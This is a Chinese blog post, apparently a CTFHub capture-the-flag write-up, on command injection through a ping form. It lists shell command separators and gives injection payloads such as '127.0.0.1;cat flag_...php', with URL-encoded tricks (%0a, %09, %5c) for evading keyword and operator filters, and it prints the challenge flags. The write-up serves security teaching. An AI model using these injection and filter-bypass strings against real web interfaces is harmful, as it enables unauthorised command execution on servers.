Fork me on GitHub

CTFHub题解-技能树-Web-RCE【过滤目录分隔符、过滤运算符、综合过滤练习】(二)

CTFHub题解-技能树-Web-Web工具配置-RCE
 
 
知识点:
 
 RCE 英文全称:remote command/code execute(远程命令/代码执行漏洞);
 
RCE分为远程命令执行ping和远程代码执行evel。
漏洞出现的原因:没有在输入口做输入处理。
我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
 
Windows系统支持的管道符如下:
1. “|”:直接执行后面的语句。
2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。
3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。
4. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

 

 
Linux系统支持的管道符如下:
1. “;”:执行完前面的语句再执行后面的语句。
2. “|”:显示后面语句的执行结果。
3. “||”:当前面的语句执行出错时,执行后面的语句。
4. “&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
5. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。
 

 

 
 
 
(四)过滤目录分隔符
 
 
 
 
1.知识点
 
(1)过滤了目录分隔符  / ,那么我们就 cd 命令进入对应的目录。
(2)base64转码
 
 
2.题解
 
 
 
 
由于过滤了 /  ,那么我们就要考虑先切换到相应目录哦~
 
 命令:127.0.0.1&cd flag_is_here;ls 
 
  cd  进入flag_is_here目录,
  ls  显示flag_is_here目录里的内容。
 
 
 
 
 
 
base64解码~ 
 
ctfhub{acb49c198ba30cab5adbfe892f2c27257923ba59}
 
 
查看源码法:
 
 
 命令:127.0.0.1&cd flag_is_here;cat flag_2358135701011.php 
 
 
 
 
 
 
 
 
 
(五)过滤运算符
 
 
 
 
 
1.知识点
 
(1)过滤了 | 与 & ,那我们就使用 ; 分隔命令来代替
(2)base64解码
 
 
 
2.题解
 
 
 
 
  过滤了 | 与 & ,那我们就使用 ; 分隔命令来代替
 
 
 
 命令:127.0.0.1;cat flag_286805817220.php 
 
 查看源码~
 
 
 
 
 base64解码法:
 
 命令:127.0.0.1;base64 flag_286805817220.php 
 
注意:   127.0.0.1;cat flag_35923221712564.php|base64   =   127.0.0.1;base64 flag_35923221712564.php  
 
 
 
ctfhub{bd7e43c24829f7227556cb9e0371764fcfe22a78}
 
 
 
 
 
 
(六)综合过滤练习
 
 
 
 
 
1.知识点
 
url补充表
 
 
 
在本题目中我们会用到:
 
   %0a 代替 换行 , %09 代替 TAB键 (因为flag被过滤了,所以我们通过TAB来补全flag_is_here)
   %5c 代替 \(用 \ 来分隔开 cat ,因为 cat 也被过滤了qwq)
 
2.题解
 
 
 
 
这里需要用到火狐的插件 Hackbar 
 
注意:
在Chrome浏览器,题目的命令框输入  127.0.0.1%0als  ,不起作用哦~
 
 
因此需要在url处修改~
 
 
 
 
我们继续用火狐的hackbar做这道题目吧~
 
 
 
 
 
查看flag_is_here文件夹下的文件: 127.0.0.1%0als%09*is_here 
 
 
 
 
 
 命令:127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_73122415714959.php 
 
注:%0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here)
  %5c代替\(用\来分隔开cat,因为cat也被过滤了qwq)
 
 
查看源码~
 
 
 
 
  ctfhub{eadba433029f76d5d9342ef56a932bd3093f5ca1}
 
 
 
 
 

 

 

 完成啦~
 
平台题目上新之后,笔者也会持续更新哒~ 
 
 
 
 参考资料:
 
https://blog.csdn.net/gui1401/article/details/83287773
https://www.cnblogs.com/chalan630/p/12542239.html
 
 
posted @ 2020-04-02 09:41  0yst3r  阅读(2478)  评论(2编辑  收藏  举报
返回顶部